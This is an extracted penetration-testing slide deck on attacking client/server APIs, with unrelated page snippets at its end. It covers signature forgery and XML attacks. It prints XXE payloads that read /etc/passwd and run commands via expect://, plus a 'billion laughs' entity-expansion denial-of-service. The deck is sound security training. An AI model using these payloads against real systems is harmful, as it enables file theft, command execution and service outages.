• No results found

Pentesting client/server API. Sergey Belov

N/A
N/A
Protected

Academic year: 2021

Share "Pentesting client/server API. Sergey Belov"

Copied!
58
0
0

Loading.... (view fulltext now)

Full text

(1)
(2)

© 2002—2014, Digital Security

2

Senior Security Auditor at Digital Security

BugHunter: Google, Yandex, Badoo, Yahoo +++

Writer: habrahabr, Xakep magazine

CTF: DEFCON 2012 CTF Final, Chaos Construction

CTF’2013

Speaker: CodeFest 2012, ZeroNights 0x03

(3)

What are we talking about?

(4)

© 2002—2014, Digital Security

4

(5)
(6)
(7)

Hacking via API

(8)
(9)
(10)
(11)
(12)

© 2002—2014, Digital Security

12

What should we test?

Logic!

Bypassing restrictions (sqli/xss)

Parameter tampering

Developing

(13)
(14)

© 2002—2014, Digital Security

14

(15)

Hacking via API

(16)

© 2002—2014, Digital Security

16

42 Kb…

(17)

Hacking via API

42 Kb…

…10 Gb?

(18)

© 2002—2014, Digital Security

18

42 Kb…

…10 Gb?

…100 Gb?

(19)

Hacking via API

42 Kb…

…10 Gb?

…100 Gb?

(20)

© 2002—2014, Digital Security

20

Say

HELLO

to

(21)

Hacking via API

The evil of JavaScript

and

(22)
(23)
(24)

© 2002—2014, Digital Security

24

(25)

Hacking via API

(26)

© 2002—2014, Digital Security

26

Query signing

Sign = sha*(…+DATA+…)

(27)
(28)

© 2002—2014, Digital Security

28

(29)

Hacking via API

Say hello again.

(30)

© 2002—2014, Digital Security

30

A=1&B=2&C=3

07ce36c769ae130708258fb5dfa3d37ca5a67514

(31)

Hacking via API

(32)

© 2002—2014, Digital Security

32

What does the attacker know?

Original data

Sign (token)

(33)

Hacking via API

What does the attacker want?

(34)

© 2002—2014, Digital Security

34

(35)

Hacking via API

Can sign new query without API key!

Vkontakte: sig = md5(name1=value1name2=value2api_secret)

Mail.RU sig = md5(uid + params + private_key)

(36)

© 2002—2014, Digital Security

36

Request hijacking…

(37)
(38)
(39)
(40)
(41)
(42)
(43)
(44)
(45)

Hacking via API

(46)

© 2002—2014, Digital Security

46

DTD Example:

<!ENTITY writer "Donald Duck.">

<!ENTITY copyright "Copyright W3Schools.">

XML example:

(47)

Hacking via API

XML entities?

(48)

© 2002—2014, Digital Security

48

<!DOCTYPE foo [

<!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM

"

file:///etc/passwd

" >]>

(49)

Hacking via API

<!DOCTYPE foo [

<!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM

expect://id

" >]>

(50)

© 2002—2014, Digital Security

50

(51)

Hacking via API

<?xml

version="1.0"

?>

<!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz

(#PCDATA)

>

<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"

>

<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"

>

<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"

>

<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"

>

<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"

>

<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"

>

(52)

© 2002—2014, Digital Security

52

(53)

Hacking via API

(54)

© 2002—2014, Digital Security

54

(55)
(56)

© 2002—2014, Digital Security

56

Testing:

https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)

XXE to RCE https://gist.github.com/joernchen/3623896

Development:

(57)

Hacking via API

Finally:

Re-test all interface restrictions;

Specific compressions;

JS callbacks;

(58)

twitter.com/sergeybelove

sbelov@dsec.ru

Digital Security в Москве: (495) 223-07-86

Digital Security в Санкт-Петербурге: (812) 703-15-47

Thanks for your attention!

Questions?

References

Related documents

Finally, in Scenario 5, we combine the expansion of both sugarcane and jatropha, including technology spillovers, to assess the overall impact of biofuels on growth and poverty

The Speaker appointed the following conferees on the part of the House to confer with a like committee from the Senate on the disagreement to House Bill No. Triche, Durand, and

Email Threading, Near Duplicate Detection, Language Identification, Repeated Content Detection.

utilises its features to create an all-in-one Android development environment with a smart visual view that is great for people just getting into app development, and

All the research groups involved in the DOMINO project contributed in 2018-2020 to the definition of best practices, locally tested, for sustainable weed management. The goal was

The relevant sources of background for the  bb final state originate from Z + jets processes, tt and tW production, diboson production, and vector boson production in association

Through the analysis of the first four moments and the Jarque-Bera test, we find that the main financial stocks in Colombia do not follow a normal

When a party seeks to invalidate a trademark by showing that it has not been used for two consecutive years, the party is making use of a legal approach known as.. When a